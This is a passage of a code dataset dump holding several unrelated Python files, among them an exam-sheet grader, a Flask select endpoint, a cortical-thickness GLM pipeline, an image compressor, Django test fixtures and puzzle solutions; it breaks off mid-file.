result+=str((i[1]//n)//2)\r\n else:\r\n print(len(pnt1))\r\n return(\"图像错误\")\r\n return(result)\r\n\r\n#矫正完成后,对画面进行切割,分别切割出考号填涂区,选择题区,和非选择题区\r\ndef paper_split(dst,s_n,line):\r\n num=dst[16*n:36*n,27*n:67*n]\r\n select=dst[43*n:43*n+(s_n+3)//4*2*n,6*n:77*n]\r\n c=[]\r\n for i in range(len(line)-1):\r\n c.append(dst[line[i]*n:line[i+1]*n,n*6:n*70])\r\n return(num,select,c)\r\n\r\ndef check_select(dst,m): #选择题阅卷,返回一个字典,{题目序号:选项} \r\n pnt1=[]\r\n pnt={}\r\n #如果dst为空图像,返回一个空字典\r\n if dst.shape[0]==0:\r\n return(pnt) \r\n s=pict(dst)\r\n cnts,h=cv2.findContours(s, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n \"\"\"dst=cv2.drawContours(dst, cnts, -1, (0, 0, 255), 3)\r\n cv2.namedWindow(\"2\",cv2.WINDOW_NORMAL)\r\n cv2.imshow(\"2\",dst)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\"\"\"\r\n for cnt in cnts:\r\n area = cv2.contourArea(cnt)\r\n if area>1000:\r\n M = cv2.moments(cnt)\r\n cx = int(M['m10'] / M['m00'])\r\n cy = int(M['m01'] / M['m00'])\r\n pnt1.append((cx, cy))\r\n \r\n ans=[\"A\",\"B\",\"C\",\"D\"]\r\n for i in pnt1:\r\n row=int((i[1]//n+1)/2)\r\n col=(i[0]//n-1)\r\n order=(row)*4+col//15+1\r\n if order>m:\r\n continue\r\n s=(col%15-2)//3\r\n if s<=3:\r\n if order in pnt:\r\n pnt[order]+=ans[s]\r\n else:\r\n pnt[order]=ans[s]\r\n else:\r\n pass\r\n return(pnt)\r\n","repo_name":"18294090/school-admin","sub_path":"app/job/paper/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11423436403","text":"products = []\ncounter = 1\ncommand = ''\nwhile command != \"stop\":\n name = input('Name: ')\n price = input('Price: ')\n amount = input('Amount: ')\n units = input('Units: ')\n products.append(\n (counter, {\"Name\": name, \"Price\": price, \"Amount\": amount, \"Units\": units})\n )\n counter += 1\n command = input(\"Write 'stop' for stop inputting: \")\n\nresult_list = {}\nfor numb, prod_dict in products:\n for key, value in prod_dict.items():\n if not result_list.get(key):\n result_list[key] = [value]\n else:\n result_list[key].append(value)\n\nfor key, value in result_list.items():\n result_list[key] = list(set(value))\n\nprint(result_list)\n\n\n\n","repo_name":"KLOTAS/Homework","sub_path":"Homework_2/Home6.py","file_name":"Home6.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"27959245528","text":"class Solution:\n def numberOfSteps (self, num: int) -> int:\n\n step_count = 0\n for i in range(num):\n if num != 0:\n\n if num %2 == 0:\n print(f'{num} is even; divide by 2 and obtain {num/2}')\n num /= 2\n\n else:\n print(f'{num} is odd; subtract 1 and obtain {num - 1}')\n num -= 1\n\n step_count += 1\n\n else:\n break\n\n return step_count\n\n\nif __name__ == '__main__':\n\n n = 14\n instance = Solution()\n solution = instance.numberOfSteps(n)\n print(solution)\n","repo_name":"shivangdubey/HacktoberFest2020","sub_path":"LeetCode/Python/number_of_steps_to_reduce_a_number_to_zero.py","file_name":"number_of_steps_to_reduce_a_number_to_zero.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"62"} +{"seq_id":"33571516362","text":"from flask import Blueprint, request, jsonify\nfrom database.db_utils import select\n\nselection = Blueprint('selection', __name__)\n\n@selection.route('/select/', methods=['GET'])\ndef select_data(table_name):\n params = request.json\n columns = params.get('columns', None) # Default to None if 'columns' key is not provided\n where_column = params.get('where_column', None)\n where_value = params.get('where_value', None)\n\n try:\n data = select(table_name, columns=columns, where_column=where_column, where_value=where_value)\n return jsonify({\"status\": \"success\", \"data\": data})\n except Exception as e:\n print({\"status\": \"error\", \"message\": str(e)})\n return jsonify({\"status\": \"error\", \"message\": \"Internal error\"})","repo_name":"sharp119/trymetrends","sub_path":"server/api/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"8934860838","text":"\nimport os\nfrom time import time\nimport warnings\nfrom os import PathLike\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom string import Template\nfrom typing import Tuple, Dict\nimport matplotlib.pyplot as plt\nfrom nilearn.surface import Mesh, load_surf_mesh\nfrom brainstat.stats.terms import FixedEffect\nfrom brainstat.stats.SLM import SLM\nfrom scipy.stats import t\nfrom functools import reduce\n\nfrom numpy.testing import assert_array_almost_equal\n\nDEFAULT_FWHM = 20\nDEFAULT_THRESHOLD_UNCORRECTED_P_VALUE = 0.001\nDEFAULT_THRESHOLD_CORRECTED_P_VALUE = 0.05\nDEFAULT_CLUSTER_THRESHOLD = 0.001\nTSV_FIRST_COLUMN = \"participant_id\"\nTSV_SECOND_COLUMN = \"session_id\"\n\n\ndef _extract_parameters(parameters: Dict) -> Tuple[float, float, float, float]:\n fwhm = DEFAULT_FWHM\n if \"sizeoffwhm\" in parameters:\n fwhm = parameters[\"sizeoffwhm\"]\n threshold_uncorrected_pvalue = DEFAULT_THRESHOLD_UNCORRECTED_P_VALUE\n if \"thresholduncorrectedpvalue\" in parameters:\n threshold_uncorrected_pvalue = parameters[\"thresholduncorrectedpvalue\"]\n threshold_corrected_pvalue = DEFAULT_THRESHOLD_CORRECTED_P_VALUE\n if \"thresholdcorrectedpvalue\" in parameters:\n threshold_corrected_pvalue = parameters[\"thresholdcorrectedpvalue\"]\n cluster_threshold = DEFAULT_CLUSTER_THRESHOLD\n if \"clusterthreshold\" in parameters:\n cluster_threshold = parameters[\"clusterthreshold\"]\n return fwhm, threshold_uncorrected_pvalue, threshold_corrected_pvalue, cluster_threshold\n\n\ndef _read_and_check_tsv_file(tsv_file: PathLike) -> pd.DataFrame:\n if not tsv_file.exists():\n raise FileNotFoundError(f\"File {tsv_file} does not exist.\")\n tsv_data = pd.read_csv(tsv_file, sep=\"\\t\")\n if len(tsv_data.columns) < 2:\n raise ValueError(\n f\"The TSV data in {tsv_file} should have at least 2 columns.\"\n )\n if tsv_data.columns[0] != TSV_FIRST_COLUMN:\n raise ValueError(\n f\"The first column in {tsv_file} should always be {TSV_FIRST_COLUMN}.\"\n )\n if tsv_data.columns[1] != TSV_SECOND_COLUMN:\n raise ValueError(\n f\"The second column in {tsv_file} should always be {TSV_SECOND_COLUMN}.\"\n )\n return tsv_data\n\n\ndef _get_t1_freesurfer_custom_file_template(base_dir):\n return Template(\n str(base_dir) +\n \"/${subject}/${session}/t1/freesurfer_cross_sectional/${subject}_${session}/surf/${hemi}.thickness.fwhm${fwhm}.fsaverage.mgh\"\n )\n\n\ndef _build_thickness_array(\n input_dir: PathLike,\n surface_file: Template,\n df: pd.DataFrame,\n fwhm: float,\n) -> np.ndarray:\n from nibabel.freesurfer.mghformat import load\n thickness = []\n for idx, row in df.iterrows():\n subject = row[TSV_FIRST_COLUMN]\n session = row[TSV_SECOND_COLUMN]\n parts = (\n load(\n input_dir / surface_file.safe_substitute(\n subject=subject, session=session, fwhm=fwhm, hemi=hemi\n )\n ).get_fdata() for hemi in ['lh', 'rh']\n )\n combined = np.vstack(parts)\n thickness.append(combined.flatten())\n thickness = np.vstack(thickness)\n if thickness.shape[0] != len(df):\n raise ValueError(\n f\"Unexpected shape for thickness array : {thickness.shape}. \"\n f\"Expected {len(df)} rows.\"\n )\n return thickness\n\n\ndef _get_average_surface(fsaverage_path: PathLike) -> Tuple[dict, Mesh]:\n meshes = [\n load_surf_mesh(str(fsaverage_path / Path(f\"{hemi}.pial\")))\n for hemi in ['lh', 'rh']\n ]\n coordinates = np.vstack([mesh.coordinates for mesh in meshes])\n faces = np.vstack([\n meshes[0].faces,\n meshes[1].faces + meshes[0].coordinates.shape[0]\n ])\n average_mesh = Mesh(\n coordinates=coordinates,\n faces=faces,\n )\n ##################\n ## UGLY HACK !!! Need investigation\n ##################\n # Uncomment the following line if getting an error\n # with negative values in bincount in Brainstat.\n # Not sure, but might be a bug in BrainStat...\n #\n #faces += 1\n #################\n average_surface = {\n \"coord\": coordinates,\n \"tri\": faces,\n }\n return average_surface, average_mesh\n\n\ndef _check_contrast(\n contrast: str,\n df: pd.DataFrame,\n glm_type: str,\n) -> Tuple[str, str, bool]:\n absolute_contrast = contrast\n with_interaction = False\n contrast_sign = \"positive\"\n if contrast.startswith(\"-\"):\n absolute_contrast = contrast[1:].lstrip()\n contrast_sign = \"negative\"\n if \"*\" in contrast:\n with_interaction = True\n warnings.warn(\n \"You included interaction as covariate in your model, \"\n \"please carefully check the format of your tsv files.\"\n )\n else:\n if absolute_contrast not in df.columns:\n raise ValueError(\n f\"Column {absolute_contrast} does not exist in provided TSV file.\"\n )\n if glm_type == \"group_comparison\":\n unique_labels = np.unique(df[absolute_contrast])\n if len(unique_labels) != 2:\n raise ValueError(\n \"For group comparison, there should be just 2 different groups!\"\n )\n return absolute_contrast, contrast_sign, with_interaction\n\n\ndef _print_clusters(model, threshold: float):\n \"\"\"Print results related to total number of clusters\n and significative clusters.\n \"\"\"\n print(\"#\" * 40)\n print(\"After correction (Clusterwise Correction for Multiple Comparisons): \")\n df = model.P['clus'][1]\n print(df)\n print(f\"Clusters found: {len(df)}\")\n print(f\"Significative clusters (after correction): {len(df[df['P'] <= threshold])}\")\n\n\ndef _plot_stat_map(mesh, texture, filename, threshold=None, title=None, verbose=True):\n from nilearn.plotting import plot_surf_stat_map\n plot_filename = filename + \".png\"\n if verbose:\n print(f\"--> Saving plot to {plot_filename}\")\n plot_surf_stat_map(\n mesh, texture, threshold=threshold, output_file=plot_filename, title=title,\n )\n\n\ndef _plot_results(results: dict, filename_root: PathLike, mesh, verbose=True):\n for name, result in results.items():\n if name != \"coefficients\":\n if isinstance(result, dict):\n texture = result['P']\n else:\n texture = result\n _plot_stat_map(\n mesh,\n texture,\n str(filename_root) + name,\n threshold=None,\n title=name,\n verbose=verbose,\n )\n\n\ndef _save_to_mat(struct, filename, key, verbose=True):\n from scipy.io import savemat\n mat_filename = filename + \".mat\"\n if verbose:\n print(f\"--> Saving matrix to {mat_filename}\")\n savemat(mat_filename, {key: struct})\n\n\ndef _build_model(design_matrix: str, df: pd.DataFrame):\n \"\"\"Build a brainstat model from the design matrix in\n string format.\n This function assumes that the design matrix is formatted\n in the following way:\n\n 1 + factor_1 + factor_2 + ...\n\n Or:\n\n factor_1 + factor_2 + ... (in this case the intercept will\n be added automatically).\n \"\"\"\n if len(design_matrix) == 0:\n raise ValueError(\"Design matrix cannot be empty.\")\n if \"+\" in design_matrix:\n terms = [_.strip() for _ in design_matrix.split(\"+\")]\n else:\n terms = [design_matrix.strip()]\n model = []\n for term in terms:\n # Intercept is automatically included in brainstat\n if term == \"1\":\n continue\n # Handles the interaction effects\n if \"*\" in term:\n sub_terms = [_.strip() for _ in term.split(\"*\")]\n model_term = reduce(\n lambda x, y: x * y,\n [_build_model_term(_, df) for _ in sub_terms]\n )\n else:\n model_term = _build_model_term(term, df)\n model.append(model_term)\n if len(model) == 1:\n return model[0]\n return reduce(lambda x, y: x + y, model)\n\n\nMISSING_TERM_ERROR_MSG = Template(\n \"Term ${term} from the design matrix is not in the columns of the \"\n \"provided TSV file. Please make sure that there is no typo.\"\n)\n\n\ndef _build_model_term(term: str, df: pd.DataFrame) -> FixedEffect:\n if term not in df.columns:\n raise ValueError(MISSING_TERM_ERROR_MSG.safe_substitute(term=term))\n return FixedEffect(df[term])\n\n\ndef _is_categorical(df: pd.DataFrame, column: str) -> bool:\n if column not in df.columns:\n raise ValueError(MISSING_TERM_ERROR_MSG.safe_substitute(term=column))\n return not df[column].dtype.name.startswith(\"float\")\n\n\ndef _get_contrasts_and_filenames(\n glm_type: str,\n contrast: str,\n df: pd.DataFrame,\n):\n (\n abs_contrast,\n contrast_sign,\n with_interaction\n ) = _check_contrast(\n contrast, df, glm_type\n )\n if glm_type == \"group_comparison\":\n if not with_interaction:\n return _get_group_contrast_without_interaction(abs_contrast, df)\n else:\n return _get_group_contrast_with_interaction(abs_contrast, df)\n elif glm_type == \"correlation\":\n return _get_correlation_contrast(abs_contrast, df, contrast_sign)\n else:\n raise ValueError(\n \"Check out if you define the glmtype flag correctly, \"\n \"or define your own general linear model, e,g MGLM.\"\n )\n\n\ndef _get_group_contrast_with_interaction(\n contrast: str,\n df: pd.DataFrame,\n):\n \"\"\"Build contrasts and filename roots for group GLMs with interaction.\"\"\"\n contrasts = dict()\n filenames = dict()\n contrast_elements = [_.strip() for _ in contrast.split(\"*\")]\n categorical = [_is_categorical(df, _) for _ in contrast_elements]\n if len(contrast_elements) != 2 or sum(categorical) != 1:\n raise ValueError(\n \"The contrast must be an interaction between one continuous \"\n \"variable and one categorical variable. Your contrast contains \"\n f\"the following variables : {contrast_elements}\"\n )\n idx = 0 if categorical[0] else 1\n categorical_contrast = contrast_elements[idx]\n continue_contrast = contrast_elements[(idx + 1) % 2]\n group_values = np.unique(df[categorical_contrast])\n built_contrast = df[continue_contrast] * (\n (df[categorical_contrast] == group_values[0]).astype(int)\n ) - df[continue_contrast] * (\n (df[categorical_contrast] == group_values[1]).astype(int)\n )\n contrasts[contrast] = built_contrast\n filenames[contrast] = (\n Template(\"interaction-${contrast_name}_measure-${feature_label}_fwhm-${fwhm}\")\n )\n return contrasts, filenames\n\n\ndef _get_group_contrast_without_interaction(\n contrast: str,\n df: pd.DataFrame,\n):\n \"\"\"Build contrasts and filename roots for group GLMs without interaction.\"\"\"\n contrasts = dict()\n filenames = dict()\n if not _is_categorical(df, contrast):\n raise ValueError(\n \"Contrast should refer to a categorical variable for group comparison. \"\n \"Please select 'correlation' for 'glm_type' otherwise.\"\n )\n group_values = np.unique(df[contrast])\n for contrast_type, (i, j) in zip([\"positive\", \"negative\"], [(0, 1), (1, 0)]):\n contrast_name = f\"{group_values[i]}-lt-{group_values[j]}\"\n contrasts[contrast_name] = (\n (df[contrast] == group_values[i]).astype(int) -\n (df[contrast] == group_values[j]).astype(int)\n )\n filenames[contrast_name] = (\n Template(\"group-${group_label}_${contrast_name}_measure-${feature_label}_fwhm-${fwhm}\")\n )\n return contrasts, filenames\n\n\ndef _get_correlation_contrast(\n contrast: str,\n df: pd.DataFrame,\n contrast_sign: str,\n):\n \"\"\"Build contrasts and filename roots for correlation GLMs.\"\"\"\n contrasts = dict()\n filenames = dict()\n built_contrast = df[contrast]\n if contrast_sign == \"negative\":\n built_contrast *= -1\n contrasts[contrast] = built_contrast\n filenames[contrast] = Template(\n \"group-${group_label}_correlation-${contrast_name}-\"\n f\"{contrast_sign}_\"\n \"measure-${feature_label}_fwhm-${fwhm}\"\n )\n return contrasts, filenames\n\n\ndef _compute_results(\n model,\n mask,\n threshold_uncorrected_pvalue,\n threshold_corrected_pvalue\n):\n results = dict()\n results[\"coefficients\"] = np.nan_to_num(model.coef)\n results[\"TStatistics\"] = np.nan_to_num(model.t)\n results[\"uncorrectedPValue\"] = dict()\n results[\"uncorrectedPValue\"][\"P\"] = 1 - t.cdf(results[\"TStatistics\"], model.df)\n results[\"uncorrectedPValue\"][\"mask\"] = mask\n results[\"uncorrectedPValue\"][\"thresh\"] = threshold_uncorrected_pvalue\n results[\"FDR\"] = model._fdr()\n results[\"correctedPValue\"] = dict()\n results[\"correctedPValue\"][\"P\"] = model.P[\"pval\"][\"P\"]\n results[\"correctedPValue\"][\"C\"] = model.P[\"pval\"][\"C\"]\n results[\"correctedPValue\"][\"mask\"] = mask\n results[\"correctedPValue\"][\"thresh\"] = threshold_corrected_pvalue\n return results\n\n\ndef _save_results_to_json(results: dict, filename_root: PathLike, verbose=True):\n import json\n out_json_file = str(filename_root) + \"_results.json\"\n if verbose:\n print(f\"--> Writing results to JSON in {out_json_file}...\")\n jsonable = dict()\n for k, v in results.items():\n if isinstance(v, np.ndarray):\n jsonable[k] = v.tolist()\n elif isinstance(v, dict):\n jsonable[k] = dict()\n for kk, vv in v.items():\n if isinstance(vv, np.ndarray):\n jsonable[k][kk] = vv.tolist()\n else:\n jsonable[k][kk] = vv\n else:\n jsonable[k] = v\n with open(out_json_file, \"w\") as fp:\n json.dump(jsonable, fp, indent=4)\n\n\ndef _save_results_to_mat(results: dict, filename_root: PathLike, verbose=True):\n # These labels are used for compatibility with the previous\n # MATLAB implementation of the Statistics Surface Pipeline\n # of Clinica.\n if verbose:\n print(\"--> Writing results to mat files...\")\n STRUCT_LABELS = {\n \"coefficients\": \"coef\",\n \"TStatistics\": \"tvaluewithmask\",\n \"uncorrectedPValue\": \"uncorrectedpvaluesstruct\",\n \"correctedPValue\": \"correctedpvaluesstruct\",\n \"FDR\": \"FDR\",\n }\n for name, result in results.items():\n _save_to_mat(\n result,\n str(filename_root) + \"_\" + name,\n STRUCT_LABELS[name],\n verbose=verbose,\n )\n\n\ndef _save_results_to_bids(results: dict, filename_root: PathLike, verbose=True):\n warnings.warn(\"Writing results to BIDS is not implemented yet.\")\n\n\nWRITERS = {\n \"json\": _save_results_to_json,\n \"mat\": _save_results_to_mat,\n \"bids\": _save_results_to_bids,\n}\n\n\ndef _save_results(results: dict, filename_root: PathLike, out_formats=\"all\", verbose=True):\n if out_formats == \"all\":\n out_formats = list(WRITERS.keys())\n for output_format in out_formats:\n if output_format not in WRITERS:\n warnings.warn(\n f\"Could not write to {output_format} because \"\n \"writer doesn't exist.\"\n )\n WRITERS[output_format](results, filename_root, verbose=verbose)\n\n\ndef clinica_surfstat(\n input_dir: PathLike,\n output_dir: PathLike,\n tsv_file: PathLike,\n design_matrix: str,\n contrast: str,\n glm_type: str,\n group_label: str,\n freesurfer_home: PathLike,\n surface_file: PathLike,\n feature_label: str,\n parameters: dict,\n verbose=True,\n):\n \"\"\"This function mimics the previous function `clinica_surfstat`\n written in MATLAB and relying on the MATLAB package SurfStat.\n This implementation is written in pure Python and rely on the\n package brainstat for GLM modeling.\n\n Parameters\n ----------\n input_dir : PathLike\n Input folder.\n\n output_dir : PathLike\n Output folder for storing results.\n\n tsv_file : PathLike\n Path to the TSV file `subjects.tsv` which contains the\n necessary metadata to run the statistical analysis.\n\n .. warning::\n The column names need to be accurate because they\n are used to defined contrast and model terms.\n Please double check for typos.\n\n design_matrix : str\n Design matrix in string format. For example \"1+Label\"\n\n contrast : str\n The contrast to be used in the GLM.\n\n .. warning::\n The contrast needs to be in the design matrix.\n\n glm_type : {\"group_comparison\", \"correlation\"}\n Type of GLM to run:\n - \"group_comparison\": Performs group comparison.\n For example \"AD - ND\".\n - \"correlation\": Performs correlation analysis.\n\n group_label : str\n\n freesurfer_home : PathLike\n Path to the home folder of Freesurfer.\n This is required to get the fsaverage templates.\n\n surface_file : PathLike\n \"\"\"\n (\n fwhm, threshold_uncorrected_pvalue,\n threshold_corrected_pvalue, cluster_threshold,\n ) = _extract_parameters(parameters)\n fsaverage_path = (freesurfer_home / Path(\"subjects/fsaverage/surf\"))\n if verbose:\n print(f\"--> fsaverage path : {fsaverage_path}\")\n df_subjects = _read_and_check_tsv_file(tsv_file)\n thickness = _build_thickness_array(\n input_dir, surface_file, df_subjects, fwhm\n )\n mask = thickness[0, :] > 0\n average_surface, average_mesh = _get_average_surface(fsaverage_path)\n if verbose:\n print(f\"--> The GLM linear model is: {design_matrix}\")\n print(f\"--> The GLM type is: {glm_type}\")\n contrasts, filenames = _get_contrasts_and_filenames(\n glm_type, contrast, df_subjects\n )\n naming_parameters = {\n \"fwhm\": fwhm,\n \"group_label\": group_label,\n \"feature_label\": feature_label,\n }\n model = _build_model(design_matrix, df_subjects)\n for contrast_name, model_contrast in contrasts.items():\n filename_root = output_dir / filenames[contrast_name].safe_substitute(\n contrast_name=contrast_name, **naming_parameters\n )\n slm_model = SLM(\n model,\n contrast=model_contrast,\n surf=average_surface,\n mask=mask,\n two_tailed=True,\n correction=[\"fdr\", \"rft\"],\n cluster_threshold=cluster_threshold,\n )\n if verbose:\n print(f\"--> Fitting the SLM model with contrast {contrast_name}...\")\n slm_model.fit(thickness)\n results = _compute_results(\n slm_model, mask, threshold_uncorrected_pvalue, threshold_corrected_pvalue\n )\n _save_results(\n results, filename_root, out_formats=\"all\", verbose=verbose\n )\n _plot_results(\n results, filename_root, average_mesh, verbose=verbose\n )\n _print_clusters(\n slm_model, threshold_corrected_pvalue\n )\n\n # beta_hat = np.linalg.pinv(model.matrix.values.T @ model.matrix.values) @ model.matrix.values.T @ thickness\n # assert_array_almost_equal(beta_hat, np.nan_to_num(slm_model.coef))\n\nif __name__ == \"__main__\":\n current_dir = Path(\n os.path.dirname(os.path.realpath(__file__))\n )\n caps_dir = Path(\n #\"/network/lustre/iss02/aramis/project/clinica/data_ci/StatisticsSurface\"\n \"/Users/nicolas.gensollen/GitRepos/clinica_data_ci/data_ci/StatisticsSurface\"\n )\n input_dir = caps_dir / Path(\"in/caps/subjects\")\n output_dir = Path(\"./out\")\n tsv_file = caps_dir / Path(\"in/subjects.tsv\")\n design_matrix = \"1 + age + sex + age * sex\"\n #design_matrix = \"1 + group + age + sex\"\n #design_matrix = \"1 + sex\"\n #contrast = \"group\"\n #contrast = \"sex\"\n contrast = \"age * sex\"\n glm_type = \"group_comparison\"\n #glm_type = \"correlation\"\n group_label = \"UnitTest\"\n freesurfer_home = Path(\"/Applications/freesurfer/7.2.0/\")\n print(f\"FreeSurfer home : {freesurfer_home}\")\n surface_file = _get_t1_freesurfer_custom_file_template(input_dir)\n print(f\"Surface file : {surface_file}\")\n feature_label = \"ct\"\n parameters = dict()\n clinica_surfstat(\n input_dir,\n output_dir,\n tsv_file,\n design_matrix,\n contrast,\n glm_type,\n group_label,\n freesurfer_home,\n surface_file,\n feature_label,\n parameters,\n verbose=True,\n )\n\n","repo_name":"NicolasGensollen/POC_Stat_Pipeline","sub_path":"legacy/clinica_surfstat.py","file_name":"clinica_surfstat.py","file_ext":"py","file_size_in_byte":20526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"35734660938","text":"from PIL import Image\nimport os\n\ndef compress_image(input_path, output_path, quality=50):\n \"\"\"\n Nén ảnh với chất lượng cụ thể.\n\n Args:\n input_path (str): Đường dẫn đến ảnh gốc.\n output_path (str): Đường dẫn đến ảnh sau khi nén.\n quality (int): Chất lượng nén (0 - 100), giá trị càng thấp càng nén mạnh.\n\n Returns:\n None\n \"\"\"\n try:\n image = Image.open(input_path)\n image.save(output_path, optimize=True, quality=quality)\n # print(f\"Đã nén ảnh thành công: {output_path}\")\n except Exception as e:\n print(input_path)\n print(f\"Lỗi: {str(e)}\")\n\n\n\nimport os\nimport multiprocessing\nimport tqdm\nimport glob\n\ndef process_folder(folder_path):\n os.mkdir(folder_path.replace('Keyframe', 'Keyframe_Compress'))\n for img_path in tqdm.tqdm(glob.glob(os.path.join(folder_path, '*'))):\n output_image_path = img_path.replace('Keyframe', 'Keyframe_Compress')\n compress_image(img_path, output_image_path, quality=50)\n\ndef process_all_folders(root_folder):\n folders = [os.path.join(root_folder, folder_name) for folder_name in os.listdir(root_folder) if os.path.isdir(os.path.join(root_folder, folder_name))]\n\n # Create a pool of worker processes\n pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())\n\n # Process each folder concurrently\n pool.map(process_folder, folders)\n\nif __name__ == \"__main__\":\n root_directory = \"/mmlabworkspace/Students/AIC/MMLAB-UIT-AIC2023/data/Merge/Keyframe\"\n\n process_all_folders(root_directory)\n\n # print('original',len(glob.glob(\"/mmlabworkspace/Students/AIC/MMLAB-UIT-AIC2023/data/Merge/Keyframe/*/*.jpg\")))\n # print('after',len(glob.glob(\"/mmlabworkspace/Students/AIC/MMLAB-UIT-AIC2023/data/Merge/Keyframe_Compress/*/*.jpg\")))\n\n","repo_name":"hungcao0402/Retrieval-Event-In-Video","sub_path":"data_preparation/compress_img.py","file_name":"compress_img.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"15048415770","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom apps.recipes import models\n\n\nclass RecipeMixin:\n def _make_category(self, name='Categoria'):\n return models.recipe_category.objects.create(name=name)\n\n def _make_user(\n self,\n username='User',\n password='123456',\n email='user@email.com',\n first_name='user',\n last_name='name',\n ):\n return User.objects.create_user(\n username=username,\n password=password,\n email=email,\n first_name=first_name,\n last_name=last_name,\n )\n\n # Usable\n def make_recipe(\n self,\n title='Test',\n description='test',\n slug='slug-test',\n preparation_time=2,\n preparation_time_unit='Minutos',\n servings=12,\n servings_unit='Pessoas',\n preparation_steps='test',\n preparation_steps_is_html=False,\n created_at='',\n updated_at='',\n is_published=True,\n category={},\n author={},\n cover='image/test/path',\n ):\n return models.Recipe.objects.create(\n title=title,\n description=description,\n slug=slug,\n preparation_time=preparation_time,\n preparation_time_unit=preparation_time_unit,\n servings=servings,\n servings_unit=servings_unit,\n preparation_steps=preparation_steps,\n preparation_steps_is_html=preparation_steps_is_html,\n created_at=created_at,\n updated_at=updated_at,\n is_published=is_published,\n category=self._make_category(**category),\n author=self._make_user(**author),\n cover=cover,\n )\n\n \n def make_recipe_default(\n self,\n title='Test', \n description= 'test',\n slug = 'slug-test',\n preparation_time = 2,\n preparation_time_unit = 'Minutos',\n servings = 12,\n servings_unit = 'Pessoas',\n preparation_steps = 'test',\n created_at = '',\n updated_at = '',\n category = {},\n author = {},\n cover = 'image/test/path',\n ):\n return models.Recipe.objects.create(\n title=title, \n description= description,\n slug = slug,\n preparation_time = preparation_time,\n preparation_time_unit = preparation_time_unit,\n servings = servings,\n servings_unit = servings_unit,\n preparation_steps = preparation_steps,\n created_at = created_at,\n updated_at = updated_at,\n category = self._make_category(**category),\n author = self._make_user(**author),\n cover = cover,\n )\n \n def make_recipes(self, len=12):\n recipes = []\n for c in range(len):\n kwargs = {\n 'title': f'Test-{c}',\n 'slug': f'slug-{c}', \n 'author': {'username': f'user_{c}'}, \n 'cover': ''}\n recipe = self.make_recipe(**kwargs)\n recipes.append(recipe)\n return recipes\n\nclass TestBase(TestCase, RecipeMixin):\n # Test Fixtures\n ...","repo_name":"Rafael-Rueda/recipes-website","sub_path":"apps/recipes/tests/fixtures/recipes_base_tests.py","file_name":"recipes_base_tests.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"691377357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"day02.py: Advent of Code 2019 --- Day 2: 1202 Program Alarm ---\n https://adventofcode.com/2019/day/2\n\"\"\"\n\n__version__ = \"1.0\"\n__maintainer__ = \"Jiří Řepík\"\n__email__ = \"jiri.repik@gmail.com\"\n__status__ = \"Submited\"\n\nimport advent\nfrom utils import *\nfrom operator import add, mul\nfrom itertools import product\n\n\ndef run(prog, *inputs):\n prog[1:3] = inputs[:]\n pc = 0\n\n while prog[pc] != 99:\n op = add if prog[pc] == 1 else mul\n a, b, c = prog[pc + 1:pc + 4]\n prog[c] = op(prog[a], prog[b])\n pc += 4\n\n return prog[0]\n\ndef download_input_data():\n global fin\n advent.setup(2019, 2, dry_run=False)\n fin = advent.get_input()\n timer_start()\n\ndef part01():\n global fin \n global nums\n global total\n global program\n program = list(map(int, fin.read().split(',')))\n result = run(program[:], 12, 2)\n assert result == 12490719\n advent.submit_answer(1, result)\n\ndef part02():\n for noun, verb in product(range(100), range(100)):\n if run(program[:], noun, verb) == 19690720:\n break\n answer = 100 * noun + verb\n assert answer == 2003\n advent.submit_answer(2, answer)\n\nif __name__ == \"__main__\":\n download_input_data()\n timer_start()\n part01()\n part02()\n","repo_name":"repji01/advent-of-code-2019","sub_path":"day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"27985475715","text":"\"\"\"\nsubsample slices and shift the short axis and long axis slices\n\"\"\"\nimport cv2\nimport numpy as np\nimport random\nfrom scipy import ndimage\nfrom scipy.ndimage.interpolation import shift\n\n\nclass ExpDtToSeg:\n \"\"\"\n Select Short axis image and convert the distance transform to binary mask.\n \"\"\"\n\n def __init__(self, sa_slices_num=13, hist_clamp=False, include_lachannel=0):\n self.sa_slices_num = sa_slices_num\n self.hist_clamp_enable = hist_clamp\n self.include_lachannel = include_lachannel\n\n def __call__(self, sample):\n # Here we just use mask instead of image as input.\n # Be careful if you use this script otherwise!\n image, mask, misc = sample['image'],sample['mask'], sample['misc']\n\n if self.include_lachannel > 0:\n sax_image = image\n laxch = image.shape[0] -1\n if laxch >= self.include_lachannel:\n lax_list = list(range(1, laxch+1))\n lax_indexes = [0] + sorted(random.sample(lax_list, k=self.include_lachannel))\n mask = mask[lax_indexes]\n sax_image = sax_image[lax_indexes]\n else:\n mask = np.pad(mask, ((0, self.include_lachannel - laxch), (0, 0), (0, 0), (0, 0)))\n sax_image = np.pad(image, ((0, self.include_lachannel - laxch), (0, 0), (0, 0), (0, 0)))\n\n else:\n sax_image = image[0:1]\n # Select Short Axis slices\n sax_mask = mask[0:1]\n laxch, sax_num, x, y = sax_mask.shape\n if sax_num < self.sa_slices_num:\n sax_mask = np.pad(sax_mask, ((0, 0), (0, self.sa_slices_num - sax_num), (0, 0), (0, 0)))\n sax_image = np.pad(sax_image, ((0, 